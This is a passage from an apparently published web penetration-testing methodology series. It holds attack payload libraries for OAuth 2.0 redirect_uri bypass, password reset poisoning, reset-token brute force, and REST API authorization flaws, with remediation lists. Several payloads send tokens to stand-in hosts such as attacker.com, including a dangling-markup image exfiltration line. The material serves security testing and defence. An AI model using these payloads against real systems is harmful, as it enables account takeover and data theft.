    -d "otp=$otp" -b "session=VAL" > /dev/null
done

Remediation Reference

Enforce MFA check server-side on every protected endpoint — not just at the MFA step
Invalidate partial-auth session tokens if MFA not completed within time limit
Rate-limit OTP attempts: max 5–10 per 15 minutes, account lockout after threshold
Single-use OTPs: immediately invalidate after first successful use
Narrow TOTP window: ±1 period (30s drift) is sufficient; never more than ±2
Account-bind OTPs: TOTP codes must be verified against the specific user’s secret
Phishing-resistant MFA: prefer hardware keys (WebAuthn/FIDO2) over TOTP or SMS
Remove SMS as fallback if TOTP/WebAuthn is available — SMS is the weakest link

Part of the Web Application Penetration Testing Methodology series.

Modbus Protocol

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Modbus is a serial communication protocol developed in 1979 for use with PLCs (Programmable Logic Controllers). It has become a de facto standard in industrial communication and is widely deployed in ICS (Industrial Control Systems) and SCADA environments. Modbus/TCP exposes the protocol over TCP port 502 and, critically, has no built-in authentication or encryption. Any device that can reach port 502 can read sensor data, write to coils and registers, and potentially manipulate physical processes.

MQTT Protocol

Tue, 24 Feb 2026 00:00:00 +0000

Overview

MQTT (Message Queuing Telemetry Transport) is a lightweight publish-subscribe messaging protocol designed for IoT devices, sensor networks, and machine-to-machine communication. It runs over TCP and is commonly deployed in smart home systems, industrial IoT, healthcare devices, fleet management, and building automation. MQTT brokers are frequently exposed with no authentication, and even when authentication is enabled, it is often transmitted in cleartext. Unauthenticated MQTT access can expose sensitive sensor data, device commands, and organizational operational data.

NoSQL Injection

Tue, 24 Feb 2026 00:00:00 +0000

NoSQL Injection

Severity: Critical | CWE: CWE-943 OWASP: A03:2021 – Injection

What Is NoSQL Injection?

NoSQL databases (MongoDB, CouchDB, Redis, Cassandra, Elasticsearch) use query languages different from SQL — often JSON/BSON objects or key-value structures. Injection occurs when user input is interpreted as query operators rather than data. MongoDB is the most commonly exploited.

SQL analog:
  SELECT * FROM users WHERE user = 'admin' AND pass = 'INJECTED';

MongoDB analog (operator injection):
  db.users.find({ user: "admin", pass: {$gt: ""} })
  // $gt: "" → password > empty string → matches any non-empty password

Two main injection styles:

OAuth 2.0 Misconfigurations

Tue, 24 Feb 2026 00:00:00 +0000

OAuth 2.0 Misconfigurations

Severity: Critical | CWE: CWE-601, CWE-346, CWE-287 OWASP: A07:2021 – Identification and Authentication Failures

What Is OAuth 2.0?

OAuth 2.0 is an authorization framework that lets third-party applications access resources on behalf of a user without exposing credentials. Key flows:

Authorization Code Flow (most common, most secure):
  1. App redirects user → Authorization Server with client_id, redirect_uri, scope, state
  2. User authenticates → AS redirects back with ?code=AUTH_CODE&state=...
  3. App exchanges code for access_token (server-to-server, with client_secret)
  4. App uses access_token to query Resource Server

Implicit Flow (legacy, token in URL fragment — mostly deprecated):
  → Access token delivered directly in redirect URL

Client Credentials (machine-to-machine, no user):
  → client_id + client_secret → access_token

Resource Owner Password (deprecated, legacy):
  → username + password directly to token endpoint

Discovery Checklist

Find authorization endpoint: /oauth/authorize, /authorize, /auth, /.well-known/openid-configuration
Find token endpoint: /oauth/token, /token
Check redirect_uri validation — wildcard, partial match, path bypass
Check state parameter — missing, static, predictable
Test PKCE bypass (Authorization Code with PKCE)
Test response_type manipulation (code→token, etc.)
Test token endpoint for client auth weaknesses (no secret required)
Check access token scope escalation
Check token leakage in Referer, logs, URL parameters
Test account linking/pre-linking CSRF
Test implicit flow token theft via open redirect
Check for /.well-known/oauth-authorization-server or /.well-known/openid-configuration
Review scope parameter for privilege escalation
Test authorization code reuse (should be single-use)

Payload Library

Attack 1 — `redirect_uri` Bypass

# Strict match bypass — add trailing slash or path component:
# Registered: https://app.com/callback
https://app.com/callback/
https://app.com/callback/extra
https://app.com/callback%0d%0a
https://app.com/callback%2f..%2fattacker

# Query string append (if server checks prefix only):
https://app.com/callback?next=https://attacker.com

# Fragment bypass:
https://app.com/callback#https://attacker.com

# Path traversal out of registered path:
# Registered: https://app.com/oauth/callback
https://app.com/oauth/callback/../../../attacker-path

# Subdomain wildcards — if registered *.app.com:
https://attacker.app.com/callback

# URL parser confusion (duplicate host):
https://app.com@attacker.com/callback
https://attacker.com#app.com/callback

# Full open redirect chain:
# 1. Find open redirect on app.com: /redirect?url=https://attacker.com
# 2. Register redirect_uri as: https://app.com/redirect?url=https://attacker.com
# 3. Auth code leaks via Referer to attacker.com

# Craft full attack URL:
https://authorization-server.com/authorize?
  client_id=APP_CLIENT_ID&
  response_type=code&
  redirect_uri=https://app.com/redirect?url=https://attacker.com&
  scope=profile+email&
  state=STOLEN_STATE

Attack 2 — Missing / Predictable `state` Parameter (CSRF on OAuth)

# Check if state is missing:
GET /authorize?client_id=X&redirect_uri=https://app.com/cb&response_type=code&scope=email
# → No state= parameter → CSRF-based account hijack possible

# If state is predictable (sequential, timestamp):
# Monitor multiple auth flows → detect pattern

# CSRF attack — force victim to link attacker's account:
# 1. Attacker starts OAuth flow, gets state+code from own account
# 2. Attacker builds URL: /callback?code=ATTACKER_CODE&state=...
# 3. Attacker tricks victim into visiting that URL
# 4. Victim's session gets linked to attacker's OAuth identity

# PoC page:
<img src="https://app.com/oauth/callback?code=ATTACKER_AUTH_CODE" width=0 height=0>

Attack 3 — Authorization Code Interception (Implicit Flow)

# Implicit flow: token delivered in URL fragment → leaks via Referer, history, logs

# If app uses response_type=token (implicit):
https://as.com/authorize?client_id=X&response_type=token&redirect_uri=https://app.com/cb

# Steal token via open redirect in redirect_uri:
https://as.com/authorize?
  client_id=X&
  response_type=token&
  redirect_uri=https://app.com/redir?goto=https://attacker.com

# Token in fragment: https://attacker.com#access_token=TOKEN&token_type=bearer
# Attacker JS reads location.hash → steals token

# Force implicit flow even if app uses code flow:
# Change response_type=code to response_type=token
# If AS allows both → token in URL, no code exchange needed

Attack 4 — Scope Escalation

# Request more scopes than application intended:
# Registered scopes: profile email
# Try adding: admin write delete openid

https://as.com/authorize?
  client_id=LEGITIMATE_APP_ID&
  response_type=code&
  redirect_uri=https://app.com/callback&
  scope=profile+email+admin+write

# If AS doesn't validate scope against client registration → escalated token

# Try undocumented scopes:
scope=profile
scope=profile email admin
scope=openid profile email phone address
scope=offline_access              # get refresh token
scope=https://graph.microsoft.com/.default   # Azure AD full access

# Use legitimate client_id with expanded scope — token issued to legitimate app
# but contains elevated permissions not intended for that client

# GraphQL-style scope: some APIs use resource-based scopes
scope=read:users write:users delete:users admin:org

Attack 5 — Authorization Code Reuse

# Authorization codes must be single-use. Test reuse:
# 1. Complete OAuth flow → capture code from redirect
# 2. Re-submit same code:
POST /oauth/token HTTP/1.1
Host: as.com
Content-Type: application/x-www-form-urlencoded

grant_type=authorization_code&
code=AUTH_CODE_JUST_USED&
redirect_uri=https://app.com/callback&
client_id=CLIENT_ID&
client_secret=CLIENT_SECRET

# If reuse works → token issued twice → code theft attack viable

Attack 6 — Token Leakage via Referer

# Authorization code in URL gets logged in:
# - Browser history
# - Server access logs
# - Referer header to next page's external resources (scripts, images, trackers)

# Test: after OAuth callback (URL has ?code=...), check:
# - Does page load external resources (scripts, images)?
# - Is Referer header sent with those requests?
# → Referer contains auth code → any external origin sees it

# Intercept with Burp and check outgoing Referer headers after /callback

# For implicit flow: fragment (#access_token=...) is not sent in Referer
# But single-page apps often pass it via postMessage or XHR → check JS handling

Attack 7 — Account Pre-Linking / Takeover

# Scenario: App allows "link your Google account"
# Attack: Pre-link victim's email to attacker's account before victim registers

# 1. Attacker registers with victim@gmail.com (if email not verified)
# 2. OR: attacker uses CSRF to link OAuth account to existing target account
# 3. Victim later registers/links → attacker already has access

# Also: OAuth account takeover via email collision:
# If IDP A and IDP B both return same email → app merges accounts
# Register on IDP A with victim@gmail.com (unverified allowed)
# Victim registers directly with password → attacker's OAuth links to it

# Check: does app require email verification before OAuth account linking?
# Does app match accounts by email across different OAuth providers?

Attack 8 — PKCE Bypass

# PKCE (Proof Key for Code Exchange) — S256 or plain challenge
# code_verifier → SHA256 → base64url → code_challenge

# If server accepts plain method (no hash):
# code_challenge = code_verifier (same value)
# If server doesn't validate method: submit without code_verifier in exchange

# Intercept authorization request:
GET /authorize?
  code_challenge=E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM&
  code_challenge_method=S256&
  ...

# Manipulate to plain:
code_challenge_method=plain
code_challenge=<plaintext_verifier>

# Skip PKCE in token exchange:
POST /token
grant_type=authorization_code&code=CODE&redirect_uri=URI
# Omit code_verifier entirely → if server doesn't enforce it

Tools

# OAuth 2.0 testing with Burp Suite:
# - Extension: "OAuth Scan" (BApp Store)
# - Extension: "CSRF Scanner" for state check
# - Repeater: replay auth codes, modify scope, test redirect_uri

# Manual token decode:
echo "ACCESS_TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool

# oauth2-proxy fuzzing:
# Test redirect_uri with ffuf:
ffuf -u "https://as.com/authorize?client_id=X&redirect_uri=FUZZ&response_type=code" \
  -w redirect_uri_payloads.txt

# Check .well-known:
curl -s https://target.com/.well-known/openid-configuration | python3 -m json.tool
curl -s https://target.com/.well-known/oauth-authorization-server | python3 -m json.tool

# Find OAuth endpoints via JS source:
grep -r "oauth\|authorize\|redirect_uri\|client_id" js/ --include="*.js"

# jwt_tool for inspecting tokens:
python3 jwt_tool.py ACCESS_TOKEN

# Test scope explosion — pass all known OAuth scopes:
scope=openid+profile+email+phone+address+offline_access+admin+write+read+delete

Remediation Reference

Strict redirect_uri validation: exact match only, no wildcard, no path prefix matching
Enforce state parameter: cryptographically random, bound to session, validated on return
Single-use authorization codes: invalidate after first use, short TTL (< 60 seconds)
PKCE required for public clients and mobile apps — reject plain method
Scope allowlist per client: don’t let clients request scopes beyond registration
Bind access tokens to client: verify client_id on every token introspection
Never include tokens in URLs: use POST body or Authorization header only
Verify email before account linking/merging across OAuth providers

Part of the Web Application Penetration Testing Methodology series.

Open Redirect

Tue, 24 Feb 2026 00:00:00 +0000

Open Redirect

Severity: Medium–High | CWE: CWE-601 OWASP: A01:2021 – Broken Access Control

What Is Open Redirect?

An open redirect occurs when an application uses user-controlled input to construct a redirect URL without proper validation. Direct impact is limited (phishing), but open redirects are critical as chain links for OAuth token theft, SSRF bypass, and CSP bypass.

https://trusted.com/redirect?url=https://attacker.com/phishing
↑ User trusts trusted.com domain in URL bar → follows redirect → lands on attacker site

High-impact chains:

OpenID Connect (OIDC) Vulnerabilities

Tue, 24 Feb 2026 00:00:00 +0000

OpenID Connect (OIDC) Vulnerabilities

Severity: High–Critical | CWE: CWE-287, CWE-346 OWASP: A07:2021 – Identification and Authentication Failures | A01:2021 – Broken Access Control

What Is OIDC?

OpenID Connect (OIDC) is an identity layer built on top of OAuth 2.0. While OAuth handles authorization (who can access what), OIDC handles authentication (who the user is). It introduces the ID Token — a JWT containing identity claims — and the UserInfo endpoint for additional claims.

Oracle TNS Listener

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Oracle Database exposes a TNS (Transparent Network Substrate) Listener on port 1521 that acts as the gateway for all database connections. The listener process, when misconfigured or running a vulnerable version, can be exploited for information disclosure, poisoning attacks, SID brute forcing, and full database access through default credentials. Oracle databases are among the highest-value targets in enterprise pentests due to the sensitive business data they contain.

Default Ports:

Oracle WebLogic Server

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Oracle WebLogic Server is a Java EE application server widely deployed in enterprise and financial sector environments. It is one of the most targeted middleware products due to its proprietary T3 protocol, IIOP support, and long history of critical deserialization vulnerabilities. WebLogic CVEs frequently receive CVSS 9.8 scores and have been used in ransomware deployment, cryptomining campaigns, and APT lateral movement.

Default Ports:

Port	Service
7001	HTTP (Admin Console, T3, IIOP — all multiplexed)
7002	HTTPS (Admin Console, T3S, IIOPS)
7003	HTTP (managed servers)
7004	HTTPS (managed servers)
7070	HTTP alternative
4007	Coherence cluster
5556	Node Manager

T3 and IIOP on 7001: Both T3 and IIOP are multiplexed on port 7001. Connection filters that block T3 often do not block IIOP. Test both protocols independently.

OS Command Injection

Tue, 24 Feb 2026 00:00:00 +0000

OS Command Injection

Severity: Critical CWE: CWE-78 OWASP: A03:2021 – Injection

What Is Command Injection?

OS Command Injection occurs when an application passes user-controlled data to a system shell (or equivalent OS execution function) without adequate sanitization. The attacker’s input is interpreted as shell commands rather than data — resulting in arbitrary code execution with the same privileges as the web server process.

Even a single injectable parameter can result in full server compromise: credential harvesting, lateral movement, persistent access, data exfiltration.

Password Reset Poisoning

Tue, 24 Feb 2026 00:00:00 +0000

Password Reset Poisoning

Severity: High–Critical | CWE: CWE-640, CWE-601 OWASP: A07:2021 – Identification and Authentication Failures

What Is Password Reset Poisoning?

Password reset poisoning exploits the generation of password reset links using attacker-influenced inputs — most commonly the Host header, X-Forwarded-Host, or other headers that control the domain embedded in the reset link.

Normal flow:
  POST /reset → App generates https://target.com/reset?token=abc → Email sent

Poisoned flow:
  POST /reset
  Host: attacker.com    ← modified
  → App generates https://attacker.com/reset?token=abc → Email sent
  → Victim clicks → token delivered to attacker.com
  → Attacker resets victim's password

Discovery Checklist

Find the password reset request (POST /forgot-password, /reset-password, etc.)
Modify Host header → check if reflected in reset link (monitor email or OOB)
Test X-Forwarded-Host, X-Host, X-Forwarded-Server, X-HTTP-Host-Override
Test Referer header — some apps use it to build base URL
Test Host with port: target.com:attacker.com — host confusion
Test with Burp Collaborator as header value
Test token predictability — sequential, time-based, short length
Test token expiry — does it expire? After how long?
Test token reuse — can same token be used twice?
Test for token in URL (GET-based reset) — Referer leakage
Check if token is leaked in response body, JSON, or other headers
Test same token for all accounts (global/static token)
Test race condition: request reset → use token → request again

Payload Library

Attack 1 — Host Header Poisoning

# Step 1: Identify the password reset endpoint
POST /forgot-password HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

email=victim@corp.com

# Step 2: Modify Host to attacker-controlled (use Burp Collaborator):
POST /forgot-password HTTP/1.1
Host: COLLABORATOR_ID.oast.pro
Content-Type: application/x-www-form-urlencoded

email=victim@corp.com

# Step 3: Check Collaborator for incoming request with token
# e.g.: GET /reset?token=VICTIM_TOKEN HTTP/1.1 Host: COLLABORATOR_ID.oast.pro

# Step 4: Use token to reset victim's password
POST /reset-password HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

token=VICTIM_TOKEN&password=NewPassword123&confirm=NewPassword123

Attack 2 — X-Forwarded-Host Override

# Many frameworks prefer X-Forwarded-Host over Host for URL generation:
POST /forgot-password HTTP/1.1
Host: target.com
X-Forwarded-Host: attacker.com

email=victim@corp.com

# Variants to test:
X-Host: attacker.com
X-Forwarded-Server: attacker.com
X-Original-Host: attacker.com
X-Rewrite-URL: https://attacker.com/reset

# Password reset via API (JSON body):
POST /api/auth/forgot-password HTTP/1.1
Host: target.com
X-Forwarded-Host: attacker.com
Content-Type: application/json

{"email": "victim@corp.com"}

Attack 3 — Dangling Markup via Host Injection

# If only part of the URL is controlled:
# Host injection → partial reset link poisoning

# Inject newline to add hidden header / exfil via img tag:
Host: target.com
X-Forwarded-Host: attacker.com"><img src="https://attacker.com/?x=

# The email HTML becomes:
# Reset your password: https://attacker.com"><img src="https://attacker.com/?x=.../reset?token=abc
# → If email client renders HTML: token in img src request to attacker

Attack 4 — Token Analysis and Brute Force

# Analyze token structure:
# Request multiple resets for your own account → compare tokens

# Token A: 5f4dcc3b5aa765d61d8327de  (hex-encoded MD5?)
# Token B: 6cb75f652a9b52798eb6cf2201057c73
# Token C: 098f6bcd4621d373cade4e832627b4f6

# MD5/SHA1 check:
echo -n "password" | md5sum    # 5f4dcc3b5aa765d61d8327de
echo -n "test" | md5sum        # 098f6bcd4621d373cade4e832627b4f6

# If token = md5(email):
echo -n "victim@corp.com" | md5sum

# If token = md5(username + timestamp):
python3 -c "import hashlib,time; print(hashlib.md5(f'admin{int(time.time())}'.encode()).hexdigest())"

# Sequential token detection:
# Token 1: 1001, Token 2: 1002 → Token for admin may be 1003

# Short token brute force (6-char alphanumeric = 56 billion but 6-digit numeric = 1M):
python3 -c "
import requests, string, itertools

chars = string.digits
for token in itertools.product(chars, repeat=6):
    t = ''.join(token)
    r = requests.get(f'https://target.com/reset?token={t}')
    if r.status_code == 200 and 'Invalid' not in r.text:
        print(f'Valid token: {t}')
        break
"

Attack 5 — Token in Referer Leakage

# If reset link is: https://target.com/reset?token=abc123
# Page at /reset loads external resources (Google Analytics, CDN scripts)
# Referer header leaks the token to third parties

# Test: visit the reset link → check outgoing Referer headers in Burp
# Network tab → look for requests to external domains after clicking reset link

# If token is in query string → it leaks to:
# - Google Analytics
# - Any third-party script on the reset page
# - Browser history
# - Web server access logs

# Also test: is token in response JSON after POST?
POST /api/reset-password
{
  "email": "attacker@myown.com"
}
# Response: {"success": true, "token": "abc123", "message": "Email sent"}
# → Token exposed in API response directly

# Some apps accept reset token as authentication:
GET /reset?token=TOKEN → shows reset form
POST /reset?token=TOKEN → changes password

# Test: can you skip the password change and use the token to log in?
# (Depends on implementation — some single-step flows)

# Also: does reset token work as a temp session?
GET /dashboard HTTP/1.1
Cookie: session=RESET_TOKEN
# → If app accepts reset token as session cookie

Tools

# Burp Collaborator:
# Use BURP_COLLABORATOR.oast.pro as Host value
# Check Collaborator for incoming DNS + HTTP with reset token

# interactsh (open-source Collaborator alternative):
interactsh-client -v
# Get your interactsh URL, use as Host value

# Token analysis:
python3 -c "
import base64, hashlib
token = 'YOUR_RESET_TOKEN'
# Check base64:
try: print('b64:', base64.b64decode(token + '=='))
except: pass
# Check hex/hash length:
print(f'Len: {len(token)}, Hex: {all(c in \"0123456789abcdef\" for c in token.lower())}')
"

# Multiple reset requests for analysis:
for i in $(seq 1 5); do
  curl -s -X POST https://target.com/forgot-password \
    -d "email=attacker+$i@yourdomain.com" &
done
wait
# Check all received emails → compare tokens for patterns

# Burp Intruder for token brute-force:
# GET /reset?token=§0000000000§
# Payload: Numbers 0000000000 to 9999999999
# Match: "New Password" in response

Remediation Reference

Generate reset URL from server configuration, not from the Host request header
Enforce strict host validation: use ALLOWED_HOSTS / server_name configuration
Cryptographically random tokens: 256-bit entropy minimum (secrets.token_urlsafe(32) in Python)
Short TTL: reset tokens expire in 10–60 minutes
Single-use: invalidate token immediately after use (even failed attempts after 3 tries)
Never send token in response body: send only via email to registered address
Bind token to specific email/account: verify that token matches the requesting account
Avoid query-string tokens for long-lived operations — use POST body or signed JWT with short TTL

Part of the Web Application Penetration Testing Methodology series.

Path Traversal / Directory Traversal

Tue, 24 Feb 2026 00:00:00 +0000

Path Traversal / Directory Traversal

Severity: High–Critical CWE: CWE-22 OWASP: A01:2021 – Broken Access Control

What Is Path Traversal?

Path Traversal (also known as Directory Traversal or ../ attack) occurs when user-controlled input is used to construct a filesystem path without proper sanitization, allowing the attacker to read (or write) files outside the intended directory.

The canonical payload is ../ — traversing one directory level up. Chained enough times, it reaches the root of the filesystem and can access any readable file: credentials, source code, private keys, configurations, OS files.

PHP Object Deserialization

Tue, 24 Feb 2026 00:00:00 +0000

PHP Object Deserialization

Severity: Critical | CWE: CWE-502 OWASP: A08:2021 – Software and Data Integrity Failures

What Is PHP Deserialization?

PHP’s unserialize() converts a serialized string back into a PHP object. If attacker-controlled data reaches unserialize(), the attacker can instantiate arbitrary classes. PHP automatically calls magic methods on deserialized objects:

__wakeup()    → called on unserialize
__destruct()  → called when object is garbage collected
__toString()  → called when object used as string
__call()      → called when invoking inaccessible method
__get()       → called when reading inaccessible property
__set()       → called when writing inaccessible property
__invoke()    → called when object used as function

A POP chain (Property-Oriented Programming) links multiple classes whose magic methods call each other, ultimately reaching a dangerous sink (file write, shell exec, SQL query, etc.).

postMessage Attacks

Tue, 24 Feb 2026 00:00:00 +0000

postMessage Attacks

Severity: High | CWE: CWE-346, CWE-79 OWASP: A03:2021 – Injection | A01:2021 – Broken Access Control

What Are postMessage Attacks?

window.postMessage() enables cross-origin communication between browser windows/iframes/workers. Security issues arise when the receiving message handler:

Fails to validate the event.origin — accepts messages from any origin
Passes event.data to dangerous sinks (eval, innerHTML, location, document.write)
Uses event.source unsafely to send sensitive data back

Attack surface: the handler is JavaScript code — exploitation leads to XSS, open redirect, CSRF, data theft, and iframe communication abuse.

Prototype Pollution (Client-Side)

Tue, 24 Feb 2026 00:00:00 +0000

Prototype Pollution (Client-Side)

Severity: High | CWE: CWE-1321 OWASP: A03:2021 – Injection

What Is Prototype Pollution?

Every JavaScript object inherits from Object.prototype. If an attacker can inject arbitrary properties into Object.prototype, those properties are inherited by all objects in the application — leading to property injection, logic bypass, and XSS.

// Normal:
let obj = {};
obj.admin        // undefined

// After prototype pollution via:
Object.prototype.admin = true;

// Now ALL objects are "admin":
let obj = {};
obj.admin        // true ← inherited from prototype

Attack surface: any function that recursively merges, clones, or sets properties from user-controlled paths like __proto__, constructor.prototype, or prototype.

Prototype Pollution (Server-Side / Node.js)

Tue, 24 Feb 2026 00:00:00 +0000

Prototype Pollution (Server-Side / Node.js)

Severity: Critical | CWE: CWE-1321 OWASP: A03:2021 – Injection

What Is Server-Side Prototype Pollution?

Same root cause as client-side (see 55_ProtoPollution_Client.md) but exploited in Node.js server processes. When user-controlled JSON/query data reaches _.merge, qs.parse, lodash.set, or similar functions on the server, polluting Object.prototype can:

Bypass authentication (add isAdmin: true to all objects)
RCE via gadget chains in template engines, child_process, spawn, or env variables
Crash the server (DoS via toString or constructor overwrite)

Unlike client-side, impact persists across all user sessions until server restarts — one successful attack affects all users.

RabbitMQ Management

Tue, 24 Feb 2026 00:00:00 +0000

Overview

RabbitMQ is a widely deployed open-source message broker implementing AMQP, MQTT, and STOMP protocols. Its management plugin exposes an HTTP API and web UI on port 15672. The notorious default credentials (guest/guest) and comprehensive management REST API make exposed RabbitMQ instances a frequent finding in internal penetration tests. Access to the management interface allows full enumeration of virtual hosts, queues, exchanges, bindings, and message interception/injection.

Default Ports:

Port	Service
5672	AMQP (unencrypted)
5671	AMQP over TLS
15672	Management HTTP API / Web UI
15671	Management HTTPS
25672	Erlang distribution (inter-node)
4369	EPMD (Erlang Port Mapper Daemon)
1883	MQTT plugin
61613	STOMP plugin
15674	STOMP over WebSocket
15692	Prometheus metrics (no auth by default)

Recon and Fingerprinting

Step 0 — Prometheus Metrics Endpoint (Pre-Authentication Intel)

Before attempting any credentials, check the Prometheus metrics endpoint. It is enabled by the rabbitmq_prometheus plugin and by default requires no authentication:

Race Conditions

Tue, 24 Feb 2026 00:00:00 +0000

Race Conditions

Severity: High–Critical | CWE: CWE-362 OWASP: A04:2021 – Insecure Design

What Are Race Conditions?

Race conditions in web apps occur when multiple concurrent requests interact with shared state before that state is properly updated. The classic pattern: read-check-act without atomicity.

Thread A: READ balance=100 → CHECK balance>50? YES → [gap] → WRITE balance=50
Thread B:                                              READ balance=100 → CHECK balance>100? YES → WRITE balance=0
→ Both succeed, but total withdrawn = 150 from 100 balance (TOCTOU)

Modern web race conditions (PortSwigger research):

Reflected XSS: Bypass & Encoding Arsenal

Tue, 24 Feb 2026 00:00:00 +0000

Reflected XSS: Bypass & Encoding Arsenal

Severity: High | CWE: CWE-79 | OWASP: A03:2021 Reference: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

How Sanitization Works — Read This First

Before throwing payloads, understand what the filter does. Send this canary and read the raw response:

Probe: '<>"/;`&=(){}[]

Map each character:

Character	Encoded to	Filter type
`<` → `<`	HTML encode	htmlspecialchars / HtmlEncode
`<` → removed	Strip	strip_tags / regex replace
`<` → `%3C`	URL encode	URL filter on reflected param
unchanged	Nothing	Vulnerable directly

Encoding layers in a real app:

REST API Security Testing

Tue, 24 Feb 2026 00:00:00 +0000

REST API Security Testing

Severity: High–Critical | CWE: CWE-284, CWE-285, CWE-200 OWASP API Top 10: API1–API10

What Is REST API Security Testing?

REST APIs expose application logic directly — often with less protection than web UIs. The OWASP API Security Top 10 defines the primary attack vectors: Broken Object Level Authorization (BOLA/IDOR), Broken Authentication, Broken Object Property Level Authorization (Mass Assignment), Rate Limiting bypass, and more.

REST API attack surface vs web UI:
- No session cookie → token-based auth → different bypass techniques
- Machine-readable responses → easier automated enumeration
- Versioned endpoints (/v1, /v2) → old versions may lack controls
- Documentation endpoints (/swagger, /openapi.json) → reveals all endpoints
- Often less WAF/filtering than web UI

Discovery Checklist

Find API documentation: /swagger-ui, /openapi.json, /api-docs, /redoc, /graphql
Enumerate versioned endpoints: /v1/, /v2/, /api/v1/, /api/v2/
Check for shadow/zombie endpoints (old versions still accessible)
Test BOLA on all object IDs (numeric, UUID, base64)
Test HTTP method override: GET→DELETE, GET→PUT via X-HTTP-Method-Override
Test mass assignment in PUT/PATCH bodies (add admin/role fields)
Test authentication header bypass: missing, invalid, expired tokens
Test rate limiting: login, OTP, search, expensive operations
Test JWT-specific attacks (see 28_JWT.md)
Check CORS on API: does it reflect Origin with Access-Control-Allow-Credentials: true?
Test for verbose error messages revealing internals
Test file upload endpoints (see 24_FileUpload.md)
Check pagination: does negative/zero offset reveal unintended data?

Payload Library

Attack 1 — BOLA / Broken Object Level Authorization

# Basic IDOR: change your ID to someone else's
GET /api/v1/users/MY_ID/profile          → 200 OK (your data)
GET /api/v1/users/1/profile              → should be 403, but...
GET /api/v1/users/ADMIN_ID/profile       → cross-account access?

# Systematic enumeration:
for id in $(seq 1 100); do
  status=$(curl -so /dev/null -w "%{http_code}" \
    "https://api.target.com/v1/users/$id/profile" \
    -H "Authorization: Bearer USER_TOKEN")
  echo "User $id: $status"
done

# UUID enumeration — less guessable but still test:
# Find UUIDs in responses, increment/fuzz them
curl https://api.target.com/v1/orders/6ba7b810-9dad-11d1-80b4-00c04fd430c8 \
  -H "Authorization: Bearer ANOTHER_USER_TOKEN"

# Object type substitution:
GET /api/orders/1234          → your order
GET /api/invoices/1234        → same ID, different resource type
GET /api/admin/users/1234     → horizontal → vertical escalation

# Nested resource BOLA:
GET /api/users/VICTIM_ID/addresses           # victim's addresses
GET /api/users/VICTIM_ID/payment-methods     # victim's payment methods
GET /api/users/VICTIM_ID/orders              # victim's order history

Attack 2 — Broken Function Level Authorization (BFLA)

# Test accessing admin-only endpoints with regular user token:
GET /api/v1/admin/users                   → list all users
POST /api/v1/admin/users/1/promote        → promote to admin
DELETE /api/v1/users/VICTIM_ID            → delete another user
GET /api/v1/reports/financial             → financial data
POST /api/v1/system/config                → system configuration

# HTTP method confusion:
# App only protects POST /resource but not PUT, PATCH, DELETE
GET /api/v1/admin/settings                → 403
POST /api/v1/admin/settings               → 403
PUT /api/v1/admin/settings                → 200? (missing protection)

# Path traversal in API:
GET /api/v1/users/me/../admin/users       → path confusion
GET /api/v1/../admin/settings             → skip auth prefix

# Version bypass:
GET /api/v2/admin/users                   → 403
GET /api/v1/admin/users                   → 200 (old version unprotected)
GET /v1/admin/users                       → different path, same backend

Attack 3 — Mass Assignment

# Find: what fields does the server accept?
# PUT /api/v1/users/me with extra fields:
curl -X PUT https://api.target.com/v1/users/me \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Test User",
    "email": "test@test.com",
    "role": "admin",
    "isAdmin": true,
    "verified": true,
    "credits": 99999,
    "subscription": "enterprise",
    "permissions": ["read", "write", "delete", "admin"]
  }'

# PATCH — partial update often even less protected:
curl -X PATCH https://api.target.com/v1/users/me \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"role": "admin"}'

# Nested mass assignment:
curl -X PUT https://api.target.com/v1/products/123 \
  -d '{"price": 0.01, "discount": 100, "internal": {"cost": 0}}'

# Registration mass assignment:
curl -X POST https://api.target.com/v1/register \
  -d '{
    "username": "attacker",
    "password": "pass",
    "isAdmin": true,
    "emailVerified": true,
    "betaAccess": true
  }'

Attack 4 — Rate Limit Bypass

# Header-based IP rotation (X-Forwarded-For etc.):
for ip in $(seq 1 50 | xargs -I{} echo "192.168.1.{}"); do
  curl -s -X POST https://api.target.com/v1/auth/login \
    -H "X-Forwarded-For: $ip" \
    -H "Content-Type: application/json" \
    -d '{"email":"admin@corp.com","password":"test"}' &
done
wait

# Rate limit per endpoint but not per action:
# Endpoint A limits to 10/min, Endpoint B has no limit
# But both write to same counter → abuse endpoint B

# Null byte bypass (some parsers treat as request boundary):
POST /api/login HTTP/1.1
email=admin@corp.com%00&password=test

# Content-Type variation:
# Rate limit checks JSON Content-Type only → bypass with form-encoded:
curl -X POST https://api.target.com/v1/otp/verify \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "otp=123456"  # instead of JSON

Attack 5 — API Key / Token Testing

# Find API keys in:
# JS files, Git history, mobile app decompiled code, documentation

# Test API key scope escalation:
# My key: read-only → try write operations
curl -X DELETE https://api.target.com/v1/users/1337 \
  -H "X-API-Key: MY_READ_ONLY_KEY"

# API key in URL → leaks in Referer, logs:
curl "https://api.target.com/v1/data?api_key=SECRET_KEY"
# More secure: Authorization: ApiKey SECRET_KEY

# Test: does API accept both header and URL param key?
# → URL param is logged in server access logs → harvest from logs

# Key rotation bypass (old keys still valid?):
curl https://api.target.com/v1/me \
  -H "Authorization: Bearer OLD_TOKEN"

# JWT-based API auth → see 28_JWT.md for full attack tree

Attack 6 — Excessive Data Exposure

# API returns more data than UI shows:
# UI shows: name, email
# API returns: name, email, phone, dob, ssn, password_hash, internal_id

curl -s https://api.target.com/v1/users/me \
  -H "Authorization: Bearer TOKEN" | python3 -m json.tool

# Nested object exposure:
curl -s https://api.target.com/v1/products/1 | python3 -m json.tool
# → {"name":"Widget","price":9.99,"internal":{"cost":0.50,"supplier_id":42}}

# Admin fields in regular user response:
# Look for: isAdmin, role, permissions, internal_notes, createdBy, updatedAt

# Batch API — get all users' data:
POST /api/graphql {"query": "{ users { nodes { id email passwordHash } } }"}
# Or:
GET /api/v1/users?page=1&per_page=10000    # pagination abuse

Attack 7 — Shadow / Zombie Endpoint Discovery

# Enumerate API versions:
